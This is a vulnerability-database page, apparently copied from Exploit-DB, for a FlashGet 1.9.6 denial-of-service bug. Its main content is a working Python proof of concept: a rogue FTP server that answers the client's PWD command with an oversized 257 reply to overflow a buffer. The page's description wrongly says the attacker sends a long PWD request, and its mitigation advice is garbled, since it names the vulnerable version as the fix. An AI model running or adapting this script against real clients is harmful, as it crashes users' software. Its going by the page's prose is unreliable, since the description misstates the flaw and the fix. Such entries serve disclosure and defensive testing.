header-logo
Suggest Exploit
vendor:
FlashGet
by:
Milad Karimi
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: FlashGet
Affected Version From: 1.9.6
Affected Version To: 1.9.6
Patch Exists: YES
Related CWE: N/A
CPE: a:flashget:flashget:1.9.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020

FlashGet 1.9.6 – Denial of Service (PoC)

A denial of service vulnerability exists in FlashGet 1.9.6. A remote attacker can send a specially crafted FTP request with a long string in the PWD command to cause a buffer overflow, resulting in a denial of service condition. The vulnerability is due to insufficient boundary checks when handling FTP requests. An attacker can send a specially crafted FTP request with a long string in the PWD command to trigger this vulnerability.

Mitigation:

Upgrade to the latest version of FlashGet 1.9.6 or later.
Source

Exploit-DB raw data:

# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
# Date: 2020-05-02
# Author: Milad Karimi
# Testen on: Kali Linux
# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
# Version: 1.9.6
# CVE : N/A

#!/usr/bin/python

from time import sleep
from socket import *

res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
    ]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'
c, addr = s.accept()
c.send(res[0])

user = ''

for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        tmp %= buf    
    print '[*][SERVER] %s' % (tmp)    
    c.send(tmp)

sleep(5)
c.close()
s.close()

print '[+] DONE'
 
# Discovered By : Milad Karimi

Navigation

Suggest Exploit

Services By CQR